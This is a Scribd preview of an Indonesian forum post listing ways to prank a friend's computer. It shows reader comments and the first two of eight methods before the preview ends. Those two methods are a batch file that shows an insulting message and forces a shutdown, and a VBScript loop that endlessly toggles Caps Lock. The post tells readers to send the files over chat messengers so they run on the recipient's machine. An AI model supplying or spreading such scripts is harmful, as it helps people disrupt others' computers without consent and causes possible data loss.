Welcome to Scribd, the world's digital library. Read, publish, and share books and documents. See more ➡
Download
Standard view
Full view
of .
Add note
Save to My Library
Sync to mobile
Look up keyword
Like this
1Activity
×
0 of .
Results for:
No results containing your search query
P. 1
8 Cara Menjaili Komputer Teman Agan

8 Cara Menjaili Komputer Teman Agan

Ratings: (0)|Views: 397|Likes:
Published by Juragan Cendol

More info:

Published by: Juragan Cendol on Feb 25, 2011
Copyright:Attribution Non-commercial

Availability:

Read on Scribd mobile: iPhone, iPad and Android.
download as PDF, DOCX, TXT or read online from Scribd
See More
See less

02/25/2011

pdf

text

original

 
8 Cara Menjaili Komputer Teman Agan ,,,
 
selamat pagi agan/wati ,, ane mw sedikit berbagi ilmu nih mudah"an aja bermanfaat(atau ambil manfaatnya) ,, di trit ini ane kaga ada maksud buruk atau apapun itu, ane cm mauberbagi ilmu saja gan jadi segala bentuk resiko dan tindakan agan/wati, itu diluartanggung jawab ane
DIMOHON SEBELUM MEMBACA INTI DARI TRIT INI, BACA SPOILER DIBAWAH INI DULU
Spoiler
for 
SYARAT UTAMA
:
pengiriman file bisa via yahoo Messenger, MSN, GoogleTalk, Skype dan semua fasilitas chatmessenger yang mendukung pengiriman fileralat ane gan kalo ane salah
Spoiler
for 
PERHATIAN ,, PERHATIAN ,, HARUS DIPERHATIKAN !!
:
UPDATE :
ada tambahan nih dari agan gamaujomblo yang baik tadinya ane mau biarin dulu gangasih tau cara ngebalikinnyabiar kita bisa sharing ilmu gan ,, tapi agan gamaujomlo ngasih tau duluan nih
Quote:Originally Posted by
gamaujomblo
 
parah kasian lo gan,,ini ane ksih tw cara berhentiin.abrani brbuat,,hrus brani brtanggung jawab
Quote:Originally Posted by
L.o.v.e.
 
cara paling gampang gan :(kalo misalnya main di warnet)
 
matiin aja langsung listriknyaEfeknya : paling lu di hajar sm dia
Quote:Originally Posted by
gitar butut
 
gan. itu cara 7 biar loopnya bisa dibatasi gmn ya? anjir, tadi gue nyoba di kompie sendiri,kwalahan gitu. hahaha.untung berhasil gue end process.
nah ini agan yang HEBAT menurut ane ,, dia praktek sendiri dengan korban dirinya sendiri ,, taupula cara menghentikan prosesnyasalut buat
agan gitar butut
ane taro pekiwan gan
Quote:Originally Posted by
isimfail
 
ane barusan dah nyoba semuanye di kompi ane sendiri gan...,wuih maknyoss...sempet kerepotan jg sih tp ane dah nemu jg obat2nya hehehe..., buat TS niceshare...
 
makasi banyak gan udah mau berani mencoba praktekin trit aneQuote:Originally Posted by
daburu
 
nais inpo ni gan... salah satu udah pernah ane coba, tapi yang caps, num, scroll locknya yang mati idup mati idup
Quote:Originally Posted by
Pochii
 
wah... asik gan... da ane coba yg pertama... untung ane tau cra matiinya jd ga perlu
 
shutdown.... thx inpo gan...
satu lagi nambah pengalaman agan/wati yang sukses dengan trit ini bagus gan ,,,ane taro dipekiwan nih kesuksesan agan
Mari langsung aja
Spoiler
for 
JAIL ,, JAIL ,, JAIL
:
Spoiler
for 
CARA 1
:syntaxini dibuat dalam notepad:@echo off msg * I don't like youshutdown -c "Error! You are too ******!" -s
Simpan dengan nama file :terserah_agan.BAT,, type file :All Filedan kirimkan efeknya adalah saat korban menerima file kiriman agan,maka komputernya otomatis FORCED SHUTDOWNSpoiler
for 
CARA 2
:syntax ini dibuat dalam notepad :Set wshShell =wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys "{CAPSLOCK}"loop
Simpan dengan nama file :terserah_agan.VBS,, type file :All Filedan kirimkan efeknya adalah saat korban menerima file kiriman agan, maka tombol CAPSLOCK kibornya akan terus menyala(bila agan matikan maka tombolnya otomatis nyala lagi)

You're Reading a Free Preview

Download
/*********** DO NOT ALTER ANYTHING BELOW THIS LINE ! ************/ var s_code=s.t();if(s_code)document.write(s_code)//-->